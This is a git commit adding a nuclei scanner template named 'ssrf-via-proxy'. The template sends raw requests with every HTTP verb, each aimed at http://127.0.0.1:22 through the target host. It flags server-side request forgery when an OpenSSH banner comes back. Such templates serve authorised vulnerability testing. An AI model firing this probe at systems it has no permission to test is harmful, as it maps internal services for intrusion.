Merge pull request #7106 from projectdiscovery/ssrf-via-proxy

Create ssrf-via-proxy.yaml
2023-05-11 14:51:15 +05:30 · 2023-05-11 14:51:15 +05:30 · 5ab6e7ec1b
parent 1fb0645cfd a454fd5325
commit 5ab6e7ec1b
1 changed files with 44 additions and 0 deletions
--- a/http/fuzzing/ssrf-via-proxy.yaml
+++ b/http/fuzzing/ssrf-via-proxy.yaml
@ -0,0 +1,44 @@
+id: ssrf-via-proxy
+
+info:
+  name: SSRF via Proxy Unsafe
+  author: geeknik,petergrifin
+  severity: unknown
+  reference:
+    - https://github.com/geeknik/the-nuclei-templates/blob/main/ssrf-by-proxy.yaml
+    - https://twitter.com/HusseiN98D/status/1649006265450782720
+    - https://twitter.com/ImoJOnDz/status/1649089777629827072
+  tags: ssrf,proxy,oast,fuzz
+
+http:
+  - payloads:
+      verb:
+        - GET
+        - HEAD
+        - POST
+        - PUT
+        - DELETE
+        - CONNECT
+        - OPTIONS
+        - TRACE
+        - PATCH
+
+    raw:
+      - |+
+        {{verb}} http://127.0.0.1:22 HTTP/1.1
+        Host: {{Hostname}}
+
+    stop-at-first-match: true
+    unsafe: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Protocol mismatch"
+          - "OpenSSH"
+        condition: and
+
+      - type: status
+        status:
+          - 200